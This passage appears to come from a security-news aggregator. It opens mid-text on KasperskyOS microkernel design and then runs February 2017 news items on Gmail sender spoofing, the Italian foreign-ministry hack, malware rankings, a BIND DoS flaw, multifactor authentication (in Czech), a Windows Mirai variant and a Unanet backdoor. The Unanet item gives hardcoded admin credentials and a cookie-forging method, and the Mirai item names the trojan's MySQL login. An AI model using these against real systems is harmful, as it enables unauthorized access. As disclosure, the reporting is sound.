This problem can be solved using an approach based on building a modular system from trusted components which are small and which implement standardized interfaces. The architecture of a secure system built in this way makes it possible to port a relatively small amount of software code to various hardware platforms and verify it, while keeping top-level modules so that they can be reused. Potentially, this makes it possible to provide security guarantees for each specific use of the OS.
The development model of the KasperskuOS operating system is based on implementing small trusted low-level components which enable top-level components to be reused. This provides maximum flexibility and efficiency in tailoring the system for the specific needs of a particular deployment, while maintaining the verifiability of its security properties.
The first step towards creating a modular operating system is using a microkernel-based architecture. The microkernel is the system’s only method of interaction and data exchange, providing total access control.
However, access control provided by the microkernel cannot implement properties of the system related to supporting specific security policies. KasperskyOS implements the principle of separating access-related decisions based on the policy defined from access control implemented at the microkernel level. Access decisions based on computing security policy compliance verdicts are made by a dedicated component – the security server. Flask is the best known architecture based on this principle.
It should be noted that a number of enhanced-security operating systems (SELinux, SEBSD) based on general-purpose systems have been built using the Flask architecture, but these systems use a large monolithic kernel. In fact, Flask does not require using a microkernel, but it works best with one.
KasperskyOS does not reproduce the Flask architecture in full but develops its ideas to provide better security and flexibility of use in target systems. The original Flask architecture describes interfaces and requirements for the two main components involved in applying security policies to interaction – a security server, which computes security verdicts, and an object manager, which provides access based on these verdicts. The development of KasperskyOS is, to a large extent, focused on preserving trust not only for mechanisms that compute and apply verdicts, but also for the configuration based on which this computation is performed. Basic security policies are combined into more sophisticated rules using a configuration language. These rules are then compiled into a component that acts as an intermediary between the security server and the microkernel, enabling verdicts to be computed in a way that provides the required business logic.
The major architectural difference between KasperskyOS and other secure operating systems available in the market is that the former implements security policies for each specific deployment of the OS. Support for those policies which are not needed is simply not included in the system. As a result, in each deployment of the operating system the security subsystem provides only required functionality, excluding everything that is not needed.
As a result, KasperskyOS provides configuration of overall security policy parameters (system-wide configuration at the security server level) and rules for applying policies to each operation performed by each entity in the system (through configuration of verdict computation).
The trusted code obtained by compiling configurations connects application software with the security model in the system, specifying which operations performed by programs should be governed by which security policies. Importantly, the code does not include any information about operations or policies except references to them.
The architecture of KasperskyOS supports flexibility, applying policies to individual operations performed by different types of processes (without potentially jeopardizing security through possible compromise of the configuration).
Of course, a microkernel-based system that has Flask-like architecture is not a unique idea invented by KasperskyOS developers. There is a history of successful microkernel development (seL4, PikeOS, Feniks/Febos), including microkernels with formally verified security properties. This work can be used to implement an OS that can guarantee security domain isolation (provide “security through isolation”) – an architecture known as MILS (Multiple Independent Domains of Safety/Security).
However, this case involves developing not just a microkernel but a fully-functional operating system that provides not only the separation of security domains and isolation of incompatible information processing environments, but also control of security policy compliance within these domains. Importantly, the microkernel, the infrastructure of the OS based on it and the security policies are developed by the same vendor. Using third-party work, even if it is of high quality, always imposes limitations.
KasperskyOS is based on a microkernel developed in-house, because this provides the greatest freedom in implementing the required security architecture.
The greatest shortcoming of operating systems built from scratch is the lack of support for existing software. In part, this shortcoming can be compensated for by maintaining compatibility with popular programming interfaces, the best known of which is POSIX.
This shortcoming is also successfully remedied by using virtualization. A secure operating system in whose environment a hypervisor for virtualizing a general-purpose system can be launched, will be able to execute software for that OS. KasperskyOS, together with Kaspersky Secure Hypervisor, provides this capability. Provided that certain conditions are met, an insecure general-purpose IS can inherit the security properties of the host OS.
KasperskyOS is built with modern trends in the development and use of operating systems in mind, in order to implement efficient, practical and secure solutions.
To summarize, the KasperskyOS secure operating system is not an extension or improvement of existing operating systems, but this does not narrow the range of its applications. The system can be used as a foundation for developing solutions that have special security requirements. Capabilities related to providing flexible and effective application execution control are inherent in the architecture of KasperskyOS. The system’s development is based on security product implementation best practices and supported by scientific and practical research.
Gmail Delivers Spoofed Messages Without Warning, Researchers Find
11.2.2017 securityweek Security
Spoofed emails could easily land in user’s Gmail inboxes without even warning them of suspicious activity, security researchers have discovered.
While spam is normally used to deliver malicious documents or links to unsuspecting users, spoofed emails have a bigger chance of luring potential victims, because they are likely to click on a link or open a document coming from what they believe is a trusted contact. When it comes to spoofed messages, the sender is impersonated or changed to another, thus making messages appear legitimate.
Which users may expect Gmail to warn them of such suspicious activity, researchers at the Morphus Segurança da Informação recently discovered that this doesn’t always happen. According to them, users should revise the trust they have on Gmail blocking messages with spoofed senders, even when no alert is displayed regarding the legitimacy of that message.
“We realized that a message that appears in your Gmail inbox folder even with an important sign, coming from one of your Gmail contacts with no spoof or security alert, may have been forged and impersonated by a fraudster or cybercriminal,” Renato Marinho, Director at Morphus Segurança da Informação, explains.
Marinho explains that the Simple Mail Transfer Protocol (SMTP) defines the “mail envelop and its parameters, such as the message sender and recipient,” and not the message content and headers. Thus, a SMTP transaction includes Mail From (establishes the return address in case of failure), Rcpt to (the recipient address), and Data (a command for the SMTP server to receive the content of the message).
The value “From” displayed in the email is usually equivalent to the value used in the SMTP command “mail from” but, because it is part of the message content, “can be freely specified by the system or person issuing commands to the SMTP server.” Basically, an attacker simply needs to change the “From” to a desired value to spoof the sender, but that is almost certainly going to trigger anti-spam or anti-phishing mechanisms, Marinho explains.
However, attackers could also attempt to send spoofed messages on behalf of a certain domain by changing the “Mail from:” SMTP command as well, a practice that can be combated by applying spoofing protection mechanisms. Among them, SPF (Sender Policy Framework) allows admins to specify the IP addresses of the mail servers that are allowed to send e-mail messages on behalf of their domain.
To verify if these protections are effective, the security researchers decided to test the spoofing of Gmail and Yahoo addresses. They discovered that, if the SMTP server’s IP address wasn’t allowed in the SPF policy of their generic domain, the message wouldn’t be delivered. When a SPF policy was in place, however, the message was delivered in Gmail, albeit Yahoo continued to block it.
Even more surprising, the researcher says, was that the message landed in the Inbox folder, and not in Spam. Further, there was almost no indication that the message wasn’t legitimate, except for a “via [the generic domain]” mention near the sender’s address. This mention, however, appears only in the web interface, but isn’t displayed in the Android or iOS applications.
After successfully spoofing messages between @gmail.com accounts, the researchers attempted to apply the strategy to corporative domains hosted by Google. They discovered not only that the messages were delivered without a warning, but that the spoofed account profile picture was also delivered (which could easily add a sense of legitimacy to the message).
“During our experiments, we’ve found a curious scenario in which Gmail detects the spoofed message. It happened when we tried to spoof an address that apparently does not exists on Gmail user base. In this situation, unlike the successful scenarios, Gmail forwarded the message to Spam folder and adds a special security alert informing that they could not verify if the message was really sent by gmail.com,” the researcher explains.
To stay protected, users are advised to pay attention to messages in their inbox coming from “@gmail.com” via another server, because they should normally be delivered by Gmail. They should also have a look at the message details, which ware available in the web application, by clicking on the “down-arrow” near “to me”. However, a spoofed message is more likely to be noticed if the full header is examined.
The researchers contacted Google Security team to report the findings, but the bug won’t be tracked as a security issue, it seems. “Although it has not been considered a security bug, in our opinion, it would be better if Gmail could at least adopt the same behavior we saw when trying to spoof a non-existing Gmail account,” Marinho says.
Russia suspected over cyber espionage campaign on the Italian foreign ministry
11.2.2017 securityaffairs Cyber
Italian officials speculate Russia was behind a cyber espionage campaign on the Italian foreign ministry that lasted for months.
The Italian Foreign Ministry was the victim of a targeted cyber espionage campaign, according to The Guardian newspaper who cited a diplomatic source that has spoken on condition of anonymity.
According to the source, the attack was launched by a nation-state actor, likely Russia.
“Russia is suspected by Italian officials of being behind a sustained hacking attack against the Italian foreign ministry last year that compromised email communications and lasted for many months before it was detected, according to people familiar with the matter.” reported The Guardian.
The source revealed that after the experts discovered the attack, the foreign ministry has introduced further security measures to improve its online “architecture” and the internal security. At the time I was writing there is no technical information about the attack neither the way the experts discovered the intrusion.
The hackers targeted the foreign ministry’s “field offices”, including embassies and staff members, they used a malware to spy on their systems and exfiltrate sensitive information.
“The official did not confirm that Moscow was behind the attack. But two other people with knowledge of the attack said the Russian state was believed to have been behind it. The hacking is now the subject of an inquiry by the chief prosecutor in Rome.” continued The Guardian.
“There were no attacks on the encrypted level. So the information – delicate, sensitive information – that is usually shared in this net, which is restricted by code, has never been attacked or part of this attack,” the government official said.
Security experts believe that the Russian Government is conducting a wide-range espionage activity in order to gather intelligence information on EU states and NATO members, the list of victims includes France, Germany, the Netherlands and Bulgaria,
Recently France the Defense Minister Le Drian expressed concerns about cyber attacks against defense systems and warns of hacking campaigns launched by Russian hackers on the upcoming elections.
Back to the present, the Italian source, who has close ties to the Foreign Ministry, confirmed that the cyber espionage campaign “did not affect the encrypted information system used to exchange the most sensitive information” but did affect “email accounts of ministry employees and the embassies”.
An Italian government official confirmed that the cyber attack occurred during last spring when Paolo Gentiloni who was serving as foreign minister, and the campaign lasted for more than four months. The official added that the hackers but did not infiltrate the encrypted system used for classified communications neither the Gentiloni’s account.
Italian foreign ministry hacked
Paolo Gentiloni, the Italian prime minister who was serving as foreign minister at the time, was not affected by the cyber attack. It is very strange the version provided by the Italian official who explained that Gentiloni avoided using email while he was foreign minister.
If true, which was the channel used by the Prime Minister Gentiloni? Why he avoided using the Government email that is monitored by the Government IT staff?
The Russia’s foreign ministry denied the involvement in the attack and said there were “no facts to prove this claim.”
I fear that also other nation-state actors may have breached our systems, Chinese hackers, North Korean Cyber army and Iranian hackers are other actors that have to be monitored carefully.
Kelihos Becomes King of the Malware Mountain
11.2.2017 securityweek Virus
The beginning of 2017 has brought a series of changes on the malware charts, as the Kelihos botnet managed to climb to the top position, while the Conficker worm dropped to fourth on the list.
An eight-year old threat, Conficker managed to remain one of the most active malware families out there last yearl, although it didn’t make it to the headlines as often as other threats. In 2015, however, the malware returned to focus briefly, after security researchers found that it had infected police body cameras.
Check Point’s latest threat report shows that Conficker is now the fourth most active malware out there, with Kelihos, HackerDefender, and Cryptowall occupying the first three positions. Conficker was the top threat in the security firm’s Top 10 “Most Wanted” malware list for quite some time.
The current leader, Kelihos, is yet another long-standing threat, one that managed to withstand several takedown attempts. In August last year, Kelihos infections registered a spike and the botnet tripled in size overnight, a clear sign that the actors behind it were considering ramping up activity. The botnet uses peer-to-peer communications, with each individual node acting as a command and control center.
Although the botnet was focused mainly on spamming stock pump and dump schemes or pharmaceutical scams, it was seen dropping malware as well, including ransomware such as MarsJoke, Wildfire, and Troldesh, as well as Trojans, including Panda Zeus, Nymain and Kronos. Most recently, security researchers observed that Kelihos was also capable of infecting removable USB drives to spread to new hosts.
The second top malware family is the HackerDefender user-mode rootkit for Windows, which can be used to hide files, processes and registry keys, as well as to implement a backdoor and port redirector. The third Most Wanted malware in January was CryptoWall, a piece of file-encrypting ransomware that uses AES encryption and the Tor anonymity network.
Nemucod (JavaScript or VBScript downloader), RookieUA (info stealer), Nivdort (multipurpose bot also known as Bayrob), Zeus (banking Trojan), Ramnit (banking Trojan), and Necurs (spam botnet mainly associated with the distribution of Locky), round up the Top 10 Most Wanted malware list.
The mobile threat landscape registered changes as well last month, as the Triada modular backdoor for Android secured the first position on the Top 3 Most Wanted mobile threats. Detailed in March last year, Triada was considered the most advanced mobile malware to date.
HummingBad, an Android Trojan capable of establishing a persistent rootkit on a device and installing additional applications, dropped to the second position. Dubbed HummingWhale, a new variant of this malware was discovered a couple of weeks ago, after it managed to infect 20 apps in Google Play and supposedly infect millions of devices.
Hiddad, a piece of Android malware that repackages legitimate apps and then releases them to a third-party store, is currently the third “most wanted” mobile threat. The malware, security researchers note, was designed to display ads but can also be used to gain access to key security details built into the OS, thus enabling the attacker to obtain sensitive user data.
“The wide range of threats seen during January utilizes all available tactics in the infection chain to try and gain a foothold on enterprise networks. To counter this organizations need advanced threat prevention measures on networks, endpoints and mobile devices to stop malware at the pre-infection stage, to ensure that they are adequately secured against the latest threats,” Check Point concludes.
Israeli Startup Empow Raises $9 Million for U.S. Expansion
11.2.2017 securityweek IT
Israeli startup Empow Cyber Security announced on Thursday that it has raised $9 million in a Series A funding round. $8 million has come from private investors and $1 million from the Office of the Chief Scientist at the Israel Ministry of Economy. The money will be used primarily to expand the company's operations in North America.
Empow currently employs three staff in its Boston, Mass. office, which will be expanded, and a second office opened on the West Coast later in 2017. Both offices are sales and marketing for the U.S. market, with R&D remaining in Ramat Gan, Israel.
Empow provides a platform that unifies separate security defenses in a more efficient and effective manner than unwieldy SIEMs. It uses security abstraction to separate the security infrastructure into primary components it calls 'security particles'. These particles are then linked together using a common language that interacts with the APIs of the different security technologies, enabling the complete security infrastructure be viewed and treated as a single entity rather than a series of individual silos.
Without that cross-technology visibility, individual alerts from different technologies can easily be missed. A possible phishing alert in isolation could be ignored by analysts. A subtle possibility of credential misuse from a different technology could also be missed.
Empow concentrates on 'intent'. If it spots a phishing possibility in the email alerts, it knows what to look for in the network alerts; and ties the phishing and credential misuse into a threat warning for the analyst.
As new attack methodologies emerge, empow can be 'taught' to recognize the different indications in the different technologies of the customer's infrastructure. empow itself is vendor-neutral, so the infrastructure itself does not need to change -- empow's purpose is to make any infrastructure more efficient. This means it can work with any existing infrastructure, whether that is on-premise or in the cloud.
While customers can develop their own 'apps' to detect, investigate and mitigate new attack methodologies, empow also provides an app store for emerging and common issues. These currently include cross-technology indicators for threats such as ransomware, spear-phishing, privilege escalation and financial data leaks.
Avi Chesla, co-founder and CEO, explains, "Empow creates an enterprise security posture that is as robust and nimble as the attacks it aims to prevent. Our security abstraction is creating a radical change in the realm of cybersecurity, making cyber-defenses exponentially better than the sum of their parts. It's like a cyber general coordinating your security army: empow helps sends the right troops into battle at the right time."
Demisto Raises $20 Million to Help Enterprises Fight Alert Fatigue
11.2.2017 securityweek Security
Demisto, a Cupertino, Calif.-based maker of software that helps Security Operations teams fight “alert fatigue” and reduce the time to respond to a breach, announced on Thursday that it has closed a $20 million Series B round of funding.
In addition to announcing the new funding, the company introduced the latest version of its security operations platform. The company’s new “Demisto Enterprise 2.0 Security Operations Platform” is an incident management platform designed to help customers integrate threat feeds and manage indicators to automate threat hunting operations.
The platform is available now with annual pricing starting at $100,000 for up to two analysts.
“Demisto was built to make security analysts’ lives easier with its combined incident response case management and security orchestration platform,” said Slavik Markovich, CEO of Demisto.
“Demisto simplifies the way enterprises manage incident response with its automated and collaborative incident response platform that delivers unprecedented insight and resolution into complex threats,” explains Jay Leek, managing director at ClearSky and former CISO of Blackstone.
According to the company, the new funds will be used to expand operations and accelerate new product development and customer rollouts, and support sales and marketing efforts.
With offices in Silicon Valley and Tel Aviv, the new funding brings Demisto’s total funding to $26 million.
Research Unearths 5 Secrets for Higher Performing CISOs
11.2.2017 securityweek Security
IANS Research has developed a model designed to help chief information security officers to maintain their inherent promise: that is, "to safeguard critical assets across space and time."
This model, which it calls CISO Impact, rests on two fundamental capabilities: technical excellence and organizational engagement. The former involves eight domains from access control to incident response; while the later includes seven factors from running infosec like a business to getting Business to own the risk.
From this model, combined with insights from more than 1,200 high-performing CISOs and information security teams, IANS has developed what it terms 'The 5 Secrets of High-Performing CISOs'.
"The connected world is a dangerous place," says Stan Dolberg, chief research officer at IANS Research, "and because of this, CISOs and their teams must lead their organizations to adopt safe business practices. However, the challenge remains that many CISOs are leading from a position of little authority or influence. The CISO Impact diagnostic provides specific ways for CISOs to assert information security leadership skills that are commonly found in organizations one step ahead on the maturity curve. Our goal is to inform, contextualize and prioritize where to invest skills, practices, and technologies. Armed with this strong guidance, CISOs can chart their own paths to leadership."
Related: Learn More at SecurityWeek's 2017 CISO Forum
Put bluntly, the purpose of this report is to help lower performing CISOs to perform better through using the methods already used by high performing CISOs. The five secrets to achieving career success are:
Lead without authority
Embrace the change agent role
Don't wait to be invited to the party
Build a cohesive cyber cadre
It's a 5 to 7-year journey to high impact
Each of these 'secrets' is discussed in the report and supported by statistical research evidence. For example, 100% of high performers lead despite having no authority, using "persuasion, negotiation, conflict management, communication, education." Only 3% of low performers succeed in this.
For the second 'secret', the report states, "High-performing CISOs know the value of engaging to drive change," says the report. "In the CISO Impact data, 3 out of 4 of high performers embrace this approach, compared to 1 in 20 of the low performers. To embrace this role, know the business, know yourself, and get ready to 'make lemonade'."
The third secret is not so widely adopted by the high performers. "More than half of high performers in the CISO Impact data set didn't wait for executives to have an epiphany that security matters," states the report. "They leveraged the power of simulation to generate the emotional experience of loss or compromise that is fundamental to an engaged executive team." Less than 1% of low performers did similar.
In secret 4, "High performers patiently assemble and train more than a team -- they culture a cyber cadre." This approach is adopted by 85% of high performers; but by only 1.4% of low performers.
The fifth secret warns that there is no quick fix. "Five to seven years is a realistic time frame for building the trust, the program, the team, and the value of information security to the point where information security is baked in."
These five secrets provide excellent advice for improving company security and enhancing CISO careers. As stand-alone research, however, the report has several problems. The first is the distinction between a high performer and a low performer. The second is that it is easier to be a high performer in some companies than it is in others.
Martin Zinaich (CSSLP, CRISC, CISSP, CISA, CISM and more) is information security officer for the City of Tampa, comments: "'You must lead without authority' -- that is so very true! You have to do that both technically and from an organic business integration standpoint. Yet," he told SecurityWeek, "the study shows that 60% of high performing security leaders report into risk and business roles (that have authority) -- and 95% of lower performing CISOs report to the CIO (where they don't). Those two stats show the simple reality that it is very difficult to lead without authority. Almost every non-technical safe corporate wide business practice I have seen where the CISO is lacking authority has come via post breach, regulations or working with the Audit department."
The danger for research statistics is that some of the low performers could be high performers in a different company with more resources and/or a more receptive C-Suite.
A similar issue occurs in the fifth secret; that is, 'it's a 5 to 7-year journey to high impact'. The reality is that few CISOs will remain in one position for that long -- in fact, it is probably only the high performing CISOs already occupying a high-flying position with a security-aware company that will do so.
Such concerns, however, only impact the statistical difference between high and low performing security officers. The basic arguments contained within the five secrets remains quality advice for any CISO who wants to better secure his organization and improve his career potential.
The IANS Research report, "The 5 Secrets of High-Performing CISOs" will be presented at the RSA Conference next week.
Potentially Serious DoS Flaw Patched in BIND
11.2.2017 securityweek Vulnerebility
A potentially serious denial-of-service (DoS) vulnerability was patched this week by the Internet Systems Consortium (ISC) in the BIND DNS software.
The flaw, tracked as CVE-2017-3135, affects BIND 9.8.8, all 9.9 releases since 9.9.3, all 9.10 releases, and all 9.11 releases.
In the case of servers with specific configurations, the vulnerability is remotely exploitable and rated as “high severity” with a CVSS score of 7.5.
“Under some conditions when using both DNS64 and RPZ [Response Policy Zones] to rewrite query responses, query processing can resume in an inconsistent state leading to either an INSIST assertion failure or an attempt to read through a NULL pointer,” ISC said in its advisory.
“Servers utilizing both DNS64 and RPZ are potentially susceptible to encountering this condition. When this condition occurs, it will result in either an INSIST assertion failure (and subsequent abort) or an attempt to read through a NULL pointer. On most platforms a NULL pointer read leads to a segmentation fault (SEGFAULT), which causes the process to be terminated,” ISC added.
Servers that don’t use RPZ and DNS64 at the same time are not affected by the security hole.
The vulnerability, reported by Ramesh Damodaran and Aliaksandr Shubnik of Infoblox, has been patched with the release of versions 9.9.9-P6, 9.10.4-P6 and 9.11.0-P3. Users have been advised to update their installations, but removing DNS64 or RPZ from the configuration or restricting the contents of the policy zone are considered a workaround.
The flaw was disclosed on Wednesday, but advance notifications were sent out on February 1. Linux distributions, most of which have classified this as a medium severity issue, are working on releasing patches.
Hackers Targeted Italy Foreign Ministry, Russia Accused
11.2.2017 securityweek Hacking
Rome - Italy's foreign ministry was attacked by hackers last year, a diplomatic source told AFP on Friday, amid reports that Russia could be to blame.
"After the first attack the system was immediately strengthened," said the source, who asked not to be named, after Britain's Guardian newspaper said the ministry had come under a sustained cyber offensive -- and officials suspected Russia.
Russia's foreign ministry said there were "no facts to prove this claim," according to Italian media reports.
The Italian source, who has close ties to the foreign ministry, said the attacks "did not affect the encrypted information system used to exchange the most sensitive information" but did affect "email accounts of ministry employees and the embassies".
The malware attack lasted over four months but did not affect then foreign minister Paolo Gentiloni -- Italy's current prime minister -- because he avoided using email during his mandate, the Guardian said.
Any sensitive information sent by email from the embassies would also have been protected because it would have been encrypted.
The daily said the hack was being investigated by Rome's chief prosecutor.
There have been concerns in recent weeks that Moscow has stepped up a cyber campaign against several European countries including Germany, France, Norway and the Netherlands.
Russia's alleged interference in the US presidential campaign last year by reputed hacking of Democratic Party computers and leaks of embarrassing communications raised fears the country may try to interfere in upcoming European elections.
Vícefaktorová autentizace jako mainstream
11.2.2017 SecurityWorld Zabezpečení
Stále více uživatelů používá pro svou identifikaci spíše otisk prstu než zadání hesla. Vícefaktorová autentizace (MFA, Multifactor Authentication) se totiž jeví jako jednodušší a bezpečnější. A navíc u ní neexistuje uložený seznam hesel, který by mohli útočníci ukrást. Jsou ale MFA už natolik propracované, aby se staly hlavním proudem?
V roce 2014 se USAA stala první finanční institucí, která zavedla rozpoznávání obličejů a hlasu do mobilní aplikace, prohlašuje Gary McAlum, tamější ředitel zabezpečení této společnosti. Rozpoznávání otisků prstů následovalo o pár měsíců později. A rok poté už měla USAA mezi svými pěti miliony uživatelů mobilní bankovní aplikace 1,1 milionu těch, kteří nativně využívali vícefaktorovou autentizaci.
„Současný model zabezpečení internetu je zastaralý a umírající. Je založen na informaci, která je známá (například vaše heslo nebo maskot na střední škole), ale vše už lze snadno zjistit – třeba pomocí úniků dat z Facebooku,“ poznamenává McAlum. „Odklon od ‚známé informace‘ je tedy naprosto nezbytný.“
„Téměř každá banka na světě používá jako alternativu vícefaktorovou autentizaci,“ tvrdí Avivah Litanová, analytička Gartneru. Po celá desetiletí se vícefaktorová autentizace využívala v podobě „bezpečnostního tokenu“, malého zařízení, které zobrazovalo jednorázové heslo, jež se každých několik minut měnilo. Bezpečnostní server banky měl stejný algoritmus a dokázal nejnovější správné heslo poznat.
„Vícefaktorová autentizace byla vždy příliš složitá a pro široké použití drahá,“ říká Jon Oltsik, bezpečnostní analytik společnosti Enterprise Strategy Group. „Co se nyní mění, je použití spotřebitelských technologií, především chytrých telefonů a rostoucí použití biometrických faktorů, jako jsou čtečky otisků prstů v chytrých telefonech.“
Definice faktorů
„Vícefaktorová autentizace je něco, co víte, něco, co máte, a něco, co jste, a používá přitom více než jeden z těchto faktorů,“ vysvětluje Michael Lynch, šéf strategií ve firmě InAuth, která se specializuje na problematiku autentizace.
„Něco, co víte, jsou přihlašovací údaje jako heslo. Něco, co máte, může být bezpečnostní token, avšak v případě mobilních telefonů jsou bezpečnostním tokenem právě tyto přístroje. Nebo to také může být počítač. Něco, co jste, je biometrie, například rozpoznávání otisku prstu, oční duhovky, hlasu nebo pulzu,“ vysvětlujeLynch.
Mezi další biometrické faktory, které se používají nebo se o nich uvažuje, patří srdeční tep, rychlost psaní na klávesnici, rozložení cév v bělmu oka nebo v kůži, způsob chůze, lokalita a vzorce dlouhodobého chování. Rozpoznávání oční duhovky ale vyžaduje kameru s funkcí infračerveného snímání.
V některých případech se využívá dvoufaktorové zabezpečení. Tradiční kombinace jména a hesla se obvykle počítá za jeden faktor a příslušné zařízení za ten druhý, popisuje Lynch. Novým trendem ale je (jako u USAA) použití mobilního zařízení jako jednoho z faktorů a biometrické vlastnosti detekované tímto zařízením jako druhého faktoru, aniž se musí použít heslo.
Lynch vysvětluje, že pro desktop lze použít tzv. otisk prohlížeče jako druhý faktor, který se vytvoří získáním informací o písmu, jazyku, aplikaci a typu prohlížeče.
„Tzv. otisk počítače se v průběhu času mění, jak se aplikace aktualizují a dochází k instalaci oprav, takže obvykle vydrží 60 dnů nebo i méně,“ což je důvodem, proč se mohou přihlašovací požadavky banky pro uživatele desktopu náhle změnit, vysvětluje Lynch a dodává, že kombinace souboru cookie a otisku prohlížeče je spolehlivější metodou.
Soubory cookie podle něj mohou vydržet stejně dlouho jako instalace prohlížeče, ale daný počítač je nemusí povolit.
„Druhý faktor však nemusíte vidět – banka téměř vždy kontroluje váš počítač přes soubor cookie,“ poznamenává Litanová. Pokud nerozpozná počítač, často pošle jednorázové heslo na mobilní telefon uživatele nebo na jeho e-mailovou adresu.
Co se týče biometrických faktorů pro mobilní zařízení, je „metoda ID využívající otisk prstu významná, protože už bývá často vestavěná, je pohodlná a uživatelé ji používají, není však lepší nebo horší než jiné metody ID,“ tvrdí Jim Ducharme, viceprezident bezpečnostní firmy RSA, která nově spadá pod Dell EMC.
Nižší popularita metod jako rozpoznávání hlasu či tváře je podle něj způsobovaná tím, že v mnoha případech nefungují – hlas v metru či tvář v nočním klubu.
Ve firmě USAA spoléhá cca 90 % jejích uživatelů na rozpoznávání otisků prstů, přičemž míra úspěšnosti přihlašování je pro otisky prstů i tváře vyšší než 90 procent, říká McAlum.
Přestože rozpoznávání hlasu více závisí na okolním prostředí, někteří uživatelé ho stále upřednostňují, dodává. (USAA nabízí i přístup pomocí kódu PIN pro případ, že by ostatní metody selhaly.)
Výběr faktoru pro použití však nezávisí vždy jen na technologii. „Na některých místech není přijatelné použít tvář jako identifikátor, protože tomu brání oblečení nebo někteří lidé považují oko za cestu k duši,“ vysvětluje Marc Boroditsky, viceprezident společnosti Authy, která dodává autentizační software.
Nemusejí se jim také z různých důvodů líbit snímače otisků prstů. V Brazílii si podle něj myslí, že to naznačuje kriminalitu. V některých částech Asie jsou zase lidé přesvědčeni, že je nečisté dotýkat se snímače otisků prstů.
„Vaše identita je osobní věc, a když začnete používat části osob pro identifikaci, zasahujete do něčeho s komplexními kulturními důsledky,“ dodává Boroditsky.
„S téměř každým biometrickým faktorem se také pojí otázka špehovanosti. Je zde děsivý aspekt detekce uživatelů bez jejich zapojení do procesu. Musíme být napřed a dát zákazníkům možnost volby. Například aby mohli vypnout zjišťování polohy a přidat další krok do procesu autentizace,“ tvrdí Boroditsky.
Windows Trojan Spreads Mirai to Linux Devices
10.2.2017 securityweek Virus
Mirai, the Linux-based malware that ensnared hundreds of thousands of Internet of Things (IoT) devices for launch one of the largest distributed denial of service (DDoS) botnets out there, has a Windows variant as well.
Mirai became popular last fall, after it targeted Brian Krebs’ blog and infrastructure provider Dyn in two of the largest DDoS attacks on record. Soon after, the malware’s source code leaked online and new variants of the Trojan were spotted, including one packing worm-like capabilities.
Although focused on Linux-based IoT devices until now, Mirai recently switched focus to Windows systems as well, Doctor Web security researchers warn. Detected as Trojan.Mirai.1, the new malware variant is written in C++ and appears capable of performing various nefarious operations, one of which involves the spreading of the Mirai botnet to Linux-based devices.
When launched on the infected Windows machine, the Trojan would connect to its command and control (C&C) server, and then download a configuration file to extract a list of IP addresses from it. Next, the malware launches a scanner to search for the network nodes listed in the configuration file, and attempts to login to them using a list of logins and passwords combinations from the same file.
According to Doctor Web’s security researchers, the Windows version of Mirai is capable of scanning and checking several TCP ports simultaneously (including 22, 23, 135, 445, 1433, 3306, and 3389).
As soon as it connects to one of the attack nodes (via any of the available protocols), the Trojan begins the execution of a series of commands indicated in the configuration file. However, should the connection be made via Remote Desktop Protocol (RDP), none of the instructions is executed.
What’s more, if the threat manages to connect to a Linux device via the Telnet protocol, it then attempts to download a binary file to it. This file is meant to subsequently download and launch the Mirai botnet.
The Windows version of Mirai can also abuse Windows Management Instrumentation (WMI) to execute commands on remote hosts, using inter-process communication (IPC) technology. The malware was designed to launch new processes with Win32_Process.Create method, and create various files (such as Windows package files containing a certain set of instructions).
If Microsoft SQL Server is present on the infected machine, the malware leverages it to spawn a series of files and a user that also has sysadmin privileges. Next, the malware abuses this user and the SQL server event service to execute various malicious tasks: to launch executable files with administrator privileges, delete files, or plant icons in the system folder for automatic launch (it can also create the corresponding logs in the Windows registry).
“After connecting to a remote MySQL server, the Trojan creates the user MySQL with the login phpminds and the password phpgod, for the purpose of achieving the same goals,” Doctor Web notes. This user has the following privileges: select, insert, update, delete, create, drop, reload, shutdown, process, file, grant, references, index, alter, show_db, super, create_tmp_table, lock_tables, execute, repl_slave, repl_client, create_view, show_view, create_routine, alter_routine, create_user, event, trigger, and create_tablespace.
Unanet Backdoor Allows Unauthenticated Access
10.2.2017 securityweek Virus
A backdoor found in the default configuration of the Unanet web application allows an unauthenticated attacker to login and manipulate user accounts and the roles they maintain.
Unanet provides end-to-end services automation, its web-based software enables the management of people and projects from a single database. According to the company, it offers “one look and feel, and one connected set of applications.”
The issue, Trustwave security researchers say, resides in a code branch within the Unanet product that maintains a hardcoded user, unlisted in the users table of the database. This user, they explain, was initially identified via a user enumeration vulnerability.
The user cannot login directly but, because session cookies within Unanet function in a vulnerable manner, with zero entropy and no session timeouts, anyone can bypass the need to authenticate with this user. The construction of a Unanet session cookie, the researchers explain, includes UserID, username in uppercase, roles concatenated together with '^', static cookie value, and digest.
What’s more, usernames and IDs were available via a user enumeration, because iterating the 'personkey' value would result in each username and id echoing into an error page that an attacker could parse to determine the list of existing usernames within the system.
Because user roles are known, since they exist within the 'Roles' tab in the preferences section, researchers managed to identify 19 roles within the environment, although they aren’t specifically associated with each user. However, researchers say that the possible permutations of users and roles can be brought down to around 5! permutations, meaning they can be determined using brute force attacks.
At this point, with the userID, usernames, and roles already discovered, all that an attacker needs to determine a Unanet session cookie is the special cookie value, which is referred to as a nonce, which, by default, is only used once. This, however, is a set to a default, although Unanet suggests it should be changed.
As long as the value hasn’t been changed, “the hidden cookie value can be brute forced offline, using the knowledge of all other values. This is true because the algorithm for generating the digest is known and when userID, username, roles, and digest are known it becomes a simple problem of solving for the single missing variable,” Trustwave security researchers explain.
User unanet (id 0), however, is not handled in the same way, and the researchers discovered that, if the personkey was zero, it would go to the makeadmin section, and that the method generated a new person 'unanet' and assigned the password 'UNANET' to it. Additionally, it called the 'setUnanetAdministrator(true)' method.
Armed with the UserID, Username, and the secret group __unanetAdministrator__, the researchers managed to generate the digest and reveal the cookie, and then to login using the user. The main issue, they say, is that anyone can use this method to access a Unanet system.
“This is not some deep, arcane issue. Anyone having access to a Unanet system is capable of generating the same conclusion via a simple code review. Additionally, even if the cookie 'nonce' was changed, any user of the system (or attacker who intercepts a request) is capable of brute forcing the new nonce offline. Currently any system that has not changed their cookie 'nonce' is vulnerable to an unauthenticated attacker being able to login with unanetAdministrator privileges,” the researchers mention.
At the moment, there are around 1600 public facing instances of Unanet that are potentially affected by this issue, Trustwave says. By exploiting the issue, an attacker could access the system and remove users, change roles, and create a new administrator. Using these privileges, the attacker can deny availability, comprise integrity, and remove confidentiality, the security researchers say.
The issue was patched in Unanet versions 10.0.51, 10.1.43, and 10.2.5.
Hundreds of Arby's Restaurants Hit by Card Breach
10.2.2017 securityweek Incindent
Arby’s Restaurant Group, one of the largest fast food sandwich restaurant chains in the United States, admitted this week that its payment processing systems had been breached by cybercriminals.
